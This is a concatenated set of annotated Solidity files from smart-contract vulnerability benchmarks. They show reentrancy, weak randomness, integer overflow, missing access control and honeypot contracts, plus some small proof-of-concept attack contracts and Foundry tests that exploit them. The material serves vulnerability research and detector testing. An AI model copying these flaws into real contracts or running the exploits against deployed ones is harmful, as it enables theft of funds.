https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-105#wallet-02-refund-nosubsol 3 | * @author: - 4 | * @vulnerable_at_lines: 36 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | /* User can add pay in and withdraw Ether. 10 | Unfortunately the developer forgot set the user's balance to 0 when refund() is called. 11 | An attacker can pay in a small amount of Ether and call refund() repeatedly to empty the contract. 12 | */ 13 | 14 | contract Wallet { 15 | address creator; 16 | 17 | mapping(address => uint256) balances; 18 | 19 | constructor() public { 20 | creator = msg.sender; 21 | } 22 | 23 | function deposit() public payable { 24 | assert(balances[msg.sender] + msg.value > balances[msg.sender]); 25 | balances[msg.sender] += msg.value; 26 | } 27 | 28 | function withdraw(uint256 amount) public { 29 | require(amount <= balances[msg.sender]); 30 | msg.sender.transfer(amount); 31 | balances[msg.sender] -= amount; 32 | } 33 | 34 | function refund() public { 35 | // ACCESS_CONTROL 36 | msg.sender.transfer(balances[msg.sender]); 37 | } 38 | 39 | // In an emergency the owner can migrate allfunds to a different address. 40 | 41 | function migrateTo(address to) public { 42 | require(creator == msg.sender); 43 | to.transfer(this.balance); 44 | } 45 | 46 | } 47 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/bad_randomness/old_blockhash.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/weak_randomness/old_blockhash.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 35 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | //Based on the the Capture the Ether challange at https://capturetheether.com/challenges/lotteries/predict-the-block-hash/ 10 | //Note that while it seems to have a 1/2^256 chance you guess the right hash, actually blockhash returns zero for blocks numbers that are more than 256 blocks ago so you can guess zero and wait. 11 | contract PredictTheBlockHashChallenge { 12 | 13 | struct guess{ 14 | uint block; 15 | bytes32 guess; 16 | } 17 | 18 | mapping(address => guess) guesses; 19 | 20 | constructor() public payable { 21 | require(msg.value == 1 ether); 22 | } 23 | 24 | function lockInGuess(bytes32 hash) public payable { 25 | require(guesses[msg.sender].block == 0); 26 | require(msg.value == 1 ether); 27 | 28 | guesses[msg.sender].guess = hash; 29 | guesses[msg.sender].block = block.number + 1; 30 | } 31 | 32 | function settle() public { 33 | require(block.number > guesses[msg.sender].block); 34 | // BAD_RANDOMNESS 35 | bytes32 answer = blockhash(guesses[msg.sender].block); 36 | 37 | guesses[msg.sender].block = 0; 38 | if (guesses[msg.sender].guess == answer) { 39 | msg.sender.transfer(2 ether); 40 | } 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Unprotected-callback.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | import "@openzeppelin/contracts/token/ERC721/extensions/ERC721Enumerable.sol"; 6 | 7 | contract ContractTest is Test { 8 | MaxMint721 MaxMint721Contract; 9 | bool complete; 10 | uint maxMints = 10; 11 | address alice = vm.addr(1); 12 | address eve = vm.addr(2); 13 | 14 | function testSafeMint() public { 15 | MaxMint721Contract = new MaxMint721(); 16 | MaxMint721Contract = new MaxMint721(); 17 | MaxMint721Contract.mint(maxMints); 18 | console.log("Bypassed maxMints, we got 19 NFTs"); 19 | console.log("NFT minted:", MaxMint721Contract.balanceOf(address(this))); 20 | 21 | } 22 | function onERC721Received( 23 | address, 24 | address, 25 | uint256, 26 | bytes memory 27 | ) public returns (bytes4) { 28 | if (!complete) { 29 | complete = true; 30 | MaxMint721Contract.mint(maxMints - 1); 31 | } 32 | return this.onERC721Received.selector; 33 | } 34 | receive() payable external{} 35 | 36 | } 37 | 38 | 39 | contract MaxMint721 is ERC721Enumerable { 40 | uint public MAX_PER_USER = 10; 41 | 42 | constructor() ERC721("ERC721","ERC721") {} 43 | 44 | function mint(uint amount) external { 45 | require(balanceOf(msg.sender) + amount <= MAX_PER_USER, "exceed max per user"); 46 | for (uint256 i = 0; i < amount; i++) { 47 | uint mintIndex = totalSupply(); 48 | _safeMint(msg.sender, mintIndex); 49 | } 50 | } 51 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Divmultiply.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | contract ContractTest is Test { 7 | Miscalculation MiscalculationContract; 8 | Calculation CalculationContract; 9 | 10 | function testMiscalculation() public { 11 | 12 | MiscalculationContract = new Miscalculation(); 13 | console.log("Perform Miscalculation Contract"); 14 | console.log("Scenario: DeFi store 10% off now, Then we buy 1 item price: $80."); 15 | console.log("Subtract the discount, get the sale price:",MiscalculationContract.price(80,90)); 16 | console.log("Solidity doesn't do decimals, so dividing before multiplying will round to zero. 0.8*90=0"); 17 | console.log("---------------------------------------------------------"); 18 | CalculationContract = new Calculation(); 19 | console.log("Perform Correct calculation Contract"); 20 | console.log("Scenario: DeFi store 10% off now, Then we buy 1 item price: $80."); 21 | console.log("Subtract the discount, get the sale price:",CalculationContract.price(80,90)); 22 | console.log("Multiply before dividing is correct. 80*90/100=72"); 23 | } 24 | 25 | } 26 | 27 | 28 | contract Miscalculation { 29 | function price(uint256 price, uint256 discount) public pure returns (uint256) { 30 | return price / 100 * discount; // wrong calculation 31 | } 32 | } 33 | 34 | contract Calculation { 35 | function price(uint256 price, uint256 discount) public pure returns (uint256) { 36 | return price * discount / 100; // correct calculation 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Privatedata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | contract ContractTest is Test { 7 | Vault VaultContract; 8 | 9 | function testReadprivatedata() public { 10 | VaultContract = new Vault(123456789); 11 | bytes32 leet = vm.load(address(VaultContract), bytes32(uint256(0))); 12 | emit log_uint(uint256(leet)); 13 | 14 | // users in slot 1 - length of array 15 | // starting from slot hash(1) - array elements 16 | // slot where array element is stored = keccak256(slot)) + (index * elementSize) 17 | // where slot = 1 and elementSize = 2 (1 (uint) + 1 (bytes32)) 18 | bytes32 user = vm.load(address(VaultContract), VaultContract.getArrayLocation(1,1,1)); 19 | emit log_uint(uint256(user)); 20 | } 21 | } 22 | 23 | contract Vault { 24 | // slot 0 25 | uint256 private password; 26 | constructor(uint256 _password) { 27 | password = _password; 28 | User memory user = User({id: 0, password: bytes32(_password)}); 29 | users.push(user); 30 | idToUser[0] = user; 31 | } 32 | 33 | struct User { 34 | uint id; 35 | bytes32 password; 36 | } 37 | 38 | // slot 1 39 | User[] public users; 40 | // slot 2 41 | mapping(uint => User) public idToUser; 42 | function getArrayLocation( 43 | uint slot, 44 | uint index, 45 | uint elementSize 46 | ) public pure returns (bytes32) { 47 | uint256 a= uint(keccak256(abi.encodePacked(slot))) + (index * elementSize); 48 | return bytes32(a); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/NEW_YEARS_GIFT.sol: -------------------------------------------------------------------------------- 1 | //https://etherscan.io/address/0x13c547Ff0888A0A876E6F1304eaeFE9E6E06FC4B 2 | 3 | pragma solidity ^0.4.19; 4 | 5 | contract NEW_YEARS_GIFT 6 | { 7 | string message; 8 | 9 | bool passHasBeenSet = false; 10 | 11 | address sender; 12 | 13 | bytes32 public hashPass; 14 | 15 | function() public payable{} 16 | 17 | function GetHash(bytes pass) public constant returns (bytes32) {return sha3(pass);} 18 | 19 | function SetPass(bytes32 hash) 20 | public 21 | payable 22 | { 23 | if( (!passHasBeenSet&&(msg.value > 1 ether)) || hashPass==0x0 ) 24 | { 25 | hashPass = hash; 26 | sender = msg.sender; 27 | } 28 | } 29 | 30 | function SetMessage(string _message) 31 | public 32 | { 33 | if(msg.sender==sender) 34 | { 35 | message =_message; 36 | } 37 | } 38 | 39 | function GetGift(bytes pass) 40 | external 41 | payable 42 | returns (string) 43 | { 44 | if(hashPass == sha3(pass)) 45 | { 46 | msg.sender.transfer(this.balance); 47 | return message; 48 | } 49 | } 50 | 51 | function Revoce() 52 | public 53 | payable 54 | { 55 | if(msg.sender==sender) 56 | { 57 | sender.transfer(this.balance); 58 | message=""; 59 | } 60 | } 61 | 62 | function PassHasBeenSet(bytes32 hash) 63 | public 64 | { 65 | if(msg.sender==sender&&hash==hashPass) 66 | { 67 | passHasBeenSet=true; 68 | } 69 | } 70 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/modifier_reentrancy.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/reentracy/modifier_reentrancy.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 15 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | contract ModifierEntrancy { 10 | mapping (address => uint) public tokenBalance; 11 | string constant name = "Nu Token"; 12 | 13 | //If a contract has a zero balance and supports the token give them some token 14 | // REENTRANCY 15 | function airDrop() hasNoBalance supportsToken public{ 16 | tokenBalance[msg.sender] += 20; 17 | } 18 | 19 | //Checks that the contract responds the way we want 20 | modifier supportsToken() { 21 | require(keccak256(abi.encodePacked("Nu Token")) == Bank(msg.sender).supportsToken()); 22 | _; 23 | } 24 | //Checks that the caller has a zero balance 25 | modifier hasNoBalance { 26 | require(tokenBalance[msg.sender] == 0); 27 | _; 28 | } 29 | } 30 | 31 | contract Bank{ 32 | function supportsToken() external pure returns(bytes32){ 33 | return(keccak256(abi.encodePacked("Nu Token"))); 34 | } 35 | } 36 | 37 | contract attack{ //An example of a contract that breaks the contract above. 38 | bool hasBeenCalled; 39 | function supportsToken() external returns(bytes32){ 40 | if(!hasBeenCalled){ 41 | hasBeenCalled = true; 42 | ModifierEntrancy(msg.sender).airDrop(); 43 | } 44 | return(keccak256(abi.encodePacked("Nu Token"))); 45 | } 46 | function call(address token) public{ 47 | ModifierEntrancy(token).airDrop(); 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/overflow_single_tx.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/ConsenSys/evm-analyzer-benchmark-suite 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 18,24,30,36,42,48 5 | */ 6 | 7 | //Single transaction overflow 8 | //Post-transaction effect: overflow escapes to publicly-readable storage 9 | 10 | pragma solidity ^0.4.23; 11 | 12 | contract IntegerOverflowSingleTransaction { 13 | uint public count = 1; 14 | 15 | // ADD overflow with result stored in state variable. 16 | function overflowaddtostate(uint256 input) public { 17 | // ARITHMETIC 18 | count += input; 19 | } 20 | 21 | // MUL overflow with result stored in state variable. 22 | function overflowmultostate(uint256 input) public { 23 | // ARITHMETIC 24 | count *= input; 25 | } 26 | 27 | // Underflow with result stored in state variable. 28 | function underflowtostate(uint256 input) public { 29 | // ARITHMETIC 30 | count -= input; 31 | } 32 | 33 | // ADD Overflow, no effect on state. 34 | function overflowlocalonly(uint256 input) public { 35 | // ARITHMETIC 36 | uint res = count + input; 37 | } 38 | 39 | // MUL Overflow, no effect on state. 40 | function overflowmulocalonly(uint256 input) public { 41 | // ARITHMETIC 42 | uint res = count * input; 43 | } 44 | 45 | // Underflow, no effect on state. 46 | function underflowlocalonly(uint256 input) public { 47 | // ARITHMETIC 48 | uint res = count - input; 49 | } 50 | 51 | } 52 | -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/PRIVATE_BANK.sol: -------------------------------------------------------------------------------- 1 | // https://etherscan.io/address/0x95d34980095380851902ccd9a1fb4c813c2cb639 2 | 3 | pragma solidity ^0.4.19; 4 | 5 | contract Private_Bank 6 | { 7 | mapping (address => uint) public balances; 8 | 9 | uint public MinDeposit = 1 ether; 10 | 11 | Log TransferLog; 12 | 13 | function Private_Bank(address _log) 14 | { 15 | TransferLog = Log(_log); 16 | } 17 | 18 | function Deposit() 19 | public 20 | payable 21 | { 22 | if(msg.value >= MinDeposit) 23 | { 24 | balances[msg.sender]+=msg.value; 25 | TransferLog.AddMessage(msg.sender,msg.value,"Deposit"); 26 | } 27 | } 28 | 29 | function CashOut(uint _am) 30 | { 31 | if(_am<=balances[msg.sender]) 32 | { 33 | 34 | if(msg.sender.call.value(_am)()) 35 | { 36 | balances[msg.sender]-=_am; 37 | TransferLog.AddMessage(msg.sender,_am,"CashOut"); 38 | } 39 | } 40 | } 41 | 42 | function() public payable{} 43 | 44 | } 45 | 46 | contract Log 47 | { 48 | 49 | struct Message 50 | { 51 | address Sender; 52 | string Data; 53 | uint Val; 54 | uint Time; 55 | } 56 | 57 | Message[] public History; 58 | 59 | Message LastMsg; 60 | 61 | function AddMessage(address _adr,uint _val,string _data) 62 | public 63 | { 64 | LastMsg.Sender = _adr; 65 | LastMsg.Time = now; 66 | LastMsg.Val = _val; 67 | LastMsg.Data = _data; 68 | History.push(LastMsg); 69 | } 70 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/time_manipulation/README.md: -------------------------------------------------------------------------------- 1 | # Time Manipulation 2 | Also known as timestamp dependence. 3 | 4 | From locking a token sale to unlocking funds at a specific time for a game, contracts sometimes need to rely on the current time. This is usually done via block.timestamp or its alias now in Solidity. But where does that value come from? From the miners! Because a transaction's miner has leeway in reporting the time at which the mining occurred, good smart contracts will avoid relying strongly on the time advertised. Note that block.timestamp is also sometimes (mis)used in the generation of random numbers as is discussed in #6. Bad Randomness. 5 | 6 | ## Attack Scenario 7 | A game pays out the very first player at midnight today. 8 | A malicious miner includes his or her attempt to win the game and sets the timestamp to midnight. 9 | A bit before midnight the miner ends up mining the block. The real current time is "close enough" to midnight (the currently set timestamp for the block), other nodes on the network decide to accept the block. 10 | 11 | ## Examples 12 | The following function only accepts calls that come after a specific date. Since miners can influence their block's timestamp (to a certain extent), they can attempt to mine a block containing their transaction with a block timestamp set in the future. If it is close enough, it will be accepted on the network and the transaction will give the miner ether before any other player could have attempted to win the game: 13 | ``` 14 | function play() public { 15 | require(now > 1521763200 && neverPlayed == true); 16 | neverPlayed = false; 17 | msg.sender.transfer(1500 ether); 18 | } 19 | ``` 20 | 21 | ## References 22 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/multiowned_vulnerable.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/solidity/unprotected_critical_functions/multiowned_vulnerable/multiowned_vulnerable.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 38 5 | */ 6 | 7 | pragma solidity ^0.4.23; 8 | 9 | /** 10 | * @title MultiOwnable 11 | */ 12 | contract MultiOwnable { 13 | address public root; 14 | mapping (address => address) public owners; // owner => parent of owner 15 | 16 | /** 17 | * @dev The Ownable constructor sets the original `owner` of the contract to the sender 18 | * account. 19 | */ 20 | constructor() public { 21 | root = msg.sender; 22 | owners[root] = root; 23 | } 24 | 25 | /** 26 | * @dev Throws if called by any account other than the owner. 27 | */ 28 | modifier onlyOwner() { 29 | require(owners[msg.sender] != 0); 30 | _; 31 | } 32 | 33 | /** 34 | * @dev Adding new owners 35 | * Note that the "onlyOwner" modifier is missing here. 36 | */ 37 | // ACCESS_CONTROL 38 | function newOwner(address _owner) external returns (bool) { 39 | require(_owner != 0); 40 | owners[_owner] = msg.sender; 41 | return true; 42 | } 43 | 44 | /** 45 | * @dev Deleting owners 46 | */ 47 | function deleteOwner(address _owner) onlyOwner external returns (bool) { 48 | require(owners[_owner] == msg.sender || (owners[_owner] != 0 && msg.sender == root)); 49 | owners[_owner] = 0; 50 | return true; 51 | } 52 | } 53 | 54 | contract TestContract is MultiOwnable { 55 | 56 | function withdrawAll() onlyOwner { 57 | msg.sender.transfer(this.balance); 58 | } 59 | 60 | function() payable { 61 | } 62 | 63 | } 64 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Invariant.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.7.0; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | //REF: https://ethereum-blockchain-developer.com/027-exceptions/04-invariants-with-assert/ 7 | 8 | contract ContractTest is Test { 9 | Invariant InvariantContract; 10 | 11 | function testInvariant() public { 12 | 13 | InvariantContract = new Invariant(); 14 | InvariantContract.receiveMoney{value: 1 ether}(); 15 | console.log("BalanceReceived:",InvariantContract.balanceReceived(address(this))); 16 | 17 | InvariantContract.receiveMoney{value: 18 ether}(); 18 | console.log("testInvariant, BalanceReceived:",InvariantContract.balanceReceived(address(this))); 19 | /* 20 | That's only 553255926290448384 Wei, or around 0.553 Ether. Where is the rest? What happened? 21 | 22 | We are storing the balance in an uint64. Unsigned integers go from 0 to 2^n-1, 23 | so that's 2^64-1 or 18446744073709551615. So, it can store a max of 18.4467... 24 | Ether. We sent 19 Ether to the contract. 25 | It automatically rolls over to 0. So, we end up with 19000000000000000000 - 18446744073709551615 -1 (the 0 value) = 553255926290448384. 26 | */ 27 | 28 | 29 | } 30 | receive() payable external{} 31 | } 32 | 33 | contract Invariant{ 34 | 35 | mapping(address => uint64) public balanceReceived; 36 | 37 | function receiveMoney() public payable { 38 | balanceReceived[msg.sender] += uint64(msg.value); 39 | } 40 | 41 | function withdrawMoney(address payable _to, uint64 _amount) public { 42 | require(_amount <= balanceReceived[msg.sender], "Not Enough Funds, aborting"); 43 | 44 | balanceReceived[msg.sender] -= _amount; 45 | _to.transfer(_amount); 46 | } 47 | } -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/CryptoRoulette.sol: -------------------------------------------------------------------------------- 1 | // https://etherscan.io/address/0x94602b0E2512DdAd62a935763BF1277c973B2758 2 | 3 | pragma solidity ^0.4.19; 4 | 5 | // CryptoRoulette 6 | // 7 | // Guess the number secretly stored in the blockchain and win the whole contract balance! 8 | // A new number is randomly chosen after each try. 9 | // 10 | // To play, call the play() method with the guessed number (1-20). Bet price: 0.1 ether 11 | 12 | contract CryptoRoulette { 13 | 14 | uint256 private secretNumber; 15 | uint256 public lastPlayed; 16 | uint256 public betPrice = 0.1 ether; 17 | address public ownerAddr; 18 | 19 | struct Game { 20 | address player; 21 | uint256 number; 22 | } 23 | Game[] public gamesPlayed; 24 | 25 | function CryptoRoulette() public { 26 | ownerAddr = msg.sender; 27 | shuffle(); 28 | } 29 | 30 | function shuffle() internal { 31 | // randomly set secretNumber with a value between 1 and 20 32 | secretNumber = uint8(sha3(now, block.blockhash(block.number-1))) % 20 + 1; 33 | } 34 | 35 | function play(uint256 number) payable public { 36 | require(msg.value >= betPrice && number <= 10); 37 | 38 | Game game; 39 | game.player = msg.sender; 40 | game.number = number; 41 | gamesPlayed.push(game); 42 | 43 | if (number == secretNumber) { 44 | // win! 45 | msg.sender.transfer(this.balance); 46 | } 47 | 48 | shuffle(); 49 | lastPlayed = now; 50 | } 51 | 52 | function kill() public { 53 | if (msg.sender == ownerAddr && now > lastPlayed + 1 days) { 54 | suicide(msg.sender); 55 | } 56 | } 57 | 58 | function() public payable { } 59 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 38 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract PrivateBank 10 | { 11 | mapping (address => uint) public balances; 12 | 13 | uint public MinDeposit = 1 ether; 14 | 15 | Log TransferLog; 16 | 17 | function PrivateBank(address _log) 18 | { 19 | TransferLog = Log(_log); 20 | } 21 | 22 | function Deposit() 23 | public 24 | payable 25 | { 26 | if(msg.value >= MinDeposit) 27 | { 28 | balances[msg.sender]+=msg.value; 29 | TransferLog.AddMessage(msg.sender,msg.value,"Deposit"); 30 | } 31 | } 32 | 33 | function CashOut(uint _am) 34 | { 35 | if(_am<=balances[msg.sender]) 36 | { 37 | // REENTRANCY 38 | if(msg.sender.call.value(_am)()) 39 | { 40 | balances[msg.sender]-=_am; 41 | TransferLog.AddMessage(msg.sender,_am,"CashOut"); 42 | } 43 | } 44 | } 45 | 46 | function() public payable{} 47 | 48 | } 49 | 50 | contract Log 51 | { 52 | 53 | struct Message 54 | { 55 | address Sender; 56 | string Data; 57 | uint Val; 58 | uint Time; 59 | } 60 | 61 | Message[] public History; 62 | 63 | Message LastMsg; 64 | 65 | function AddMessage(address _adr,uint _val,string _data) 66 | public 67 | { 68 | LastMsg.Sender = _adr; 69 | LastMsg.Time = now; 70 | LastMsg.Val = _val; 71 | LastMsg.Data = _data; 72 | History.push(LastMsg); 73 | } 74 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 38 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract PrivateBank 10 | { 11 | mapping (address => uint) public balances; 12 | 13 | uint public MinDeposit = 1 ether; 14 | 15 | Log TransferLog; 16 | 17 | function PrivateBank(address _lib) 18 | { 19 | TransferLog = Log(_lib); 20 | } 21 | 22 | function Deposit() 23 | public 24 | payable 25 | { 26 | if(msg.value >= MinDeposit) 27 | { 28 | balances[msg.sender]+=msg.value; 29 | TransferLog.AddMessage(msg.sender,msg.value,"Deposit"); 30 | } 31 | } 32 | 33 | function CashOut(uint _am) 34 | { 35 | if(_am<=balances[msg.sender]) 36 | { 37 | // REENTRANCY 38 | if(msg.sender.call.value(_am)()) 39 | { 40 | balances[msg.sender]-=_am; 41 | TransferLog.AddMessage(msg.sender,_am,"CashOut"); 42 | } 43 | } 44 | } 45 | 46 | function() public payable{} 47 | 48 | } 49 | 50 | contract Log 51 | { 52 | 53 | struct Message 54 | { 55 | address Sender; 56 | string Data; 57 | uint Val; 58 | uint Time; 59 | } 60 | 61 | Message[] public History; 62 | 63 | Message LastMsg; 64 | 65 | function AddMessage(address _adr,uint _val,string _data) 66 | public 67 | { 68 | LastMsg.Sender = _adr; 69 | LastMsg.Time = now; 70 | LastMsg.Val = _val; 71 | LastMsg.Data = _data; 72 | History.push(LastMsg); 73 | } 74 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 40 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract Private_Bank 10 | { 11 | mapping (address => uint) public balances; 12 | 13 | uint public MinDeposit = 1 ether; 14 | 15 | Log TransferLog; 16 | 17 | function Private_Bank(address _log) 18 | { 19 | TransferLog = Log(_log); 20 | } 21 | 22 | function Deposit() 23 | public 24 | payable 25 | { 26 | if(msg.value > MinDeposit) 27 | { 28 | balances[msg.sender]+=msg.value; 29 | TransferLog.AddMessage(msg.sender,msg.value,"Deposit"); 30 | } 31 | } 32 | 33 | function CashOut(uint _am) 34 | public 35 | payable 36 | { 37 | if(_am<=balances[msg.sender]) 38 | { 39 | // REENTRANCY 40 | if(msg.sender.call.value(_am)()) 41 | { 42 | balances[msg.sender]-=_am; 43 | TransferLog.AddMessage(msg.sender,_am,"CashOut"); 44 | } 45 | } 46 | } 47 | 48 | function() public payable{} 49 | 50 | } 51 | 52 | contract Log 53 | { 54 | 55 | struct Message 56 | { 57 | address Sender; 58 | string Data; 59 | uint Val; 60 | uint Time; 61 | } 62 | 63 | Message[] public History; 64 | 65 | Message LastMsg; 66 | 67 | function AddMessage(address _adr,uint _val,string _data) 68 | public 69 | { 70 | LastMsg.Sender = _adr; 71 | LastMsg.Time = now; 72 | LastMsg.Val = _val; 73 | LastMsg.Data = _data; 74 | History.push(LastMsg); 75 | } 76 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 41 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract ETH_VAULT 10 | { 11 | mapping (address => uint) public balances; 12 | 13 | Log TransferLog; 14 | 15 | uint public MinDeposit = 1 ether; 16 | 17 | function ETH_VAULT(address _log) 18 | public 19 | { 20 | TransferLog = Log(_log); 21 | } 22 | 23 | function Deposit() 24 | public 25 | payable 26 | { 27 | if(msg.value > MinDeposit) 28 | { 29 | balances[msg.sender]+=msg.value; 30 | TransferLog.AddMessage(msg.sender,msg.value,"Deposit"); 31 | } 32 | } 33 | 34 | function CashOut(uint _am) 35 | public 36 | payable 37 | { 38 | if(_am<=balances[msg.sender]) 39 | { 40 | // REENTRANCY 41 | if(msg.sender.call.value(_am)()) 42 | { 43 | balances[msg.sender]-=_am; 44 | TransferLog.AddMessage(msg.sender,_am,"CashOut"); 45 | } 46 | } 47 | } 48 | 49 | function() public payable{} 50 | 51 | } 52 | 53 | contract Log 54 | { 55 | 56 | struct Message 57 | { 58 | address Sender; 59 | string Data; 60 | uint Val; 61 | uint Time; 62 | } 63 | 64 | Message[] public History; 65 | 66 | Message LastMsg; 67 | 68 | function AddMessage(address _adr,uint _val,string _data) 69 | public 70 | { 71 | LastMsg.Sender = _adr; 72 | LastMsg.Time = now; 73 | LastMsg.Val = _val; 74 | LastMsg.Data = _data; 75 | History.push(LastMsg); 76 | } 77 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 41 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract ETH_VAULT 10 | { 11 | mapping (address => uint) public balances; 12 | 13 | uint public MinDeposit = 1 ether; 14 | 15 | Log TransferLog; 16 | 17 | function ETH_VAULT(address _log) 18 | public 19 | { 20 | TransferLog = Log(_log); 21 | } 22 | 23 | function Deposit() 24 | public 25 | payable 26 | { 27 | if(msg.value > MinDeposit) 28 | { 29 | balances[msg.sender]+=msg.value; 30 | TransferLog.AddMessage(msg.sender,msg.value,"Deposit"); 31 | } 32 | } 33 | 34 | function CashOut(uint _am) 35 | public 36 | payable 37 | { 38 | if(_am<=balances[msg.sender]) 39 | { 40 | // REENTRANCY 41 | if(msg.sender.call.value(_am)()) 42 | { 43 | balances[msg.sender]-=_am; 44 | TransferLog.AddMessage(msg.sender,_am,"CashOut"); 45 | } 46 | } 47 | } 48 | 49 | function() public payable{} 50 | 51 | } 52 | 53 | contract Log 54 | { 55 | 56 | struct Message 57 | { 58 | address Sender; 59 | string Data; 60 | uint Val; 61 | uint Time; 62 | } 63 | 64 | Message[] public History; 65 | 66 | Message LastMsg; 67 | 68 | function AddMessage(address _adr,uint _val,string _data) 69 | public 70 | { 71 | LastMsg.Sender = _adr; 72 | LastMsg.Time = now; 73 | LastMsg.Val = _val; 74 | LastMsg.Data = _data; 75 | History.push(LastMsg); 76 | } 77 | } -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/RACEFORETH.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.4.21; 2 | 3 | // How fast can you get to 100 points and win the prize? 4 | // First person to deposit 0.1 eth (100 finney) wins the entire prize! 5 | // 1 finney = 1 point 6 | 7 | contract RACEFORETH { 8 | // 100 points to win! 9 | uint256 public SCORE_TO_WIN = 100 finney; 10 | uint256 public PRIZE; 11 | 12 | // 100 points = 0.1 ether 13 | // Speed limit: 0.05 eth to prevent insta-win 14 | // Prevents people from going too fast! 15 | uint256 public speed_limit = 50 finney; 16 | 17 | // Keep track of everyone's score 18 | mapping (address => uint256) racerScore; 19 | mapping (address => uint256) racerSpeedLimit; 20 | 21 | uint256 latestTimestamp; 22 | address owner; 23 | 24 | function RACEFORETH () public payable { 25 | PRIZE = msg.value; 26 | owner = msg.sender; 27 | } 28 | 29 | function race() public payable { 30 | if (racerSpeedLimit[msg.sender] == 0) { racerSpeedLimit[msg.sender] = speed_limit; } 31 | require(msg.value <= racerSpeedLimit[msg.sender] && msg.value > 1 wei); 32 | 33 | racerScore[msg.sender] += msg.value; 34 | racerSpeedLimit[msg.sender] = (racerSpeedLimit[msg.sender] / 2); 35 | 36 | latestTimestamp = now; 37 | 38 | // YOU WON 39 | if (racerScore[msg.sender] >= SCORE_TO_WIN) { 40 | msg.sender.transfer(PRIZE); 41 | } 42 | } 43 | 44 | function () public payable { 45 | race(); 46 | } 47 | 48 | // Pull the prize if no one has raced in 3 days :( 49 | function endRace() public { 50 | require(msg.sender == owner); 51 | require(now > latestTimestamp + 3 days); 52 | 53 | msg.sender.transfer(this.balance); 54 | } 55 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 44 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract ETH_FUND 10 | { 11 | mapping (address => uint) public balances; 12 | 13 | uint public MinDeposit = 1 ether; 14 | 15 | Log TransferLog; 16 | 17 | uint lastBlock; 18 | 19 | function ETH_FUND(address _log) 20 | public 21 | { 22 | TransferLog = Log(_log); 23 | } 24 | 25 | function Deposit() 26 | public 27 | payable 28 | { 29 | 